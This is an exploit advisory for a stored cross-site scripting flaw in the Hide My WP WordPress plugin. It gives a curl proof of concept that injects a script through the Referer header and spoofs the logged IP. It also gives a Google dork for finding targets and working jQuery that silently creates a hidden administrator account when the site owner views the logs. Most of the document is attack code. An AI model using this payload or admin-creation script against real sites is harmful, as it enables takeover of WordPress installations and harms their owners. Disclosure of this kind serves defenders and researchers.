[WP] Hide My WP XSS vulnerability
Exploit Title: Hide My WP XSS vulnerability
Date: 20-07-2015
Software Link: http://codecanyon.net/item/hide-my-wp-no-one-can-know-you-use-wordpress/4177158
Version 4.51.1
Google dork: ff957fea/includes/css/style.css
Fix: turn off IDS logging
Description
An attacker can make a fake attack attempt which will be logged, and can inject a javascript. The attacker also can spoof their IP in the logs.
Proof of Concept
curl –referer ‘<script src=”//….”> // () { :; };’ –header ‘X-FORWARDED-FOR: 8.8.8.8’ http://example.com
The site’s owner will get a notification about the fake attack attempt, when he checks it in the logs the included js will run. The attacker can create an admin user in the background with the example js below.
///Example js to create admin user:
jQuery(‘body’).prepend(‘<iframe id=”test” style=”position:absolute;top:-10000px” src=”/wp-admin/user-new.php”></iframe>’);
jQuery(‘#test’).load(function(){
jQuery(‘#test’).contents().find(‘#user_login’).val(‘pwned’);
jQuery(‘#test’).contents().find(‘#email’).val(’[email protected]’);
//Prevent browser prompt “remember password”
jQuery(‘#test’).contents().find(‘#pass1’).attr(‘type’,’text’);
jQuery(‘#test’).contents().find(‘#pass2’).attr(‘type’,’text’);
jQuery(‘#role’).val(‘administrator’);
jQuery(‘#test’).contents().find(‘#pass1’).val(‘dummypass’);
jQuery(‘#test’).contents().find(‘#pass2’).val(‘dummypass’);
jQuery(‘#test’).contents().find(‘#createuser’).submit();
});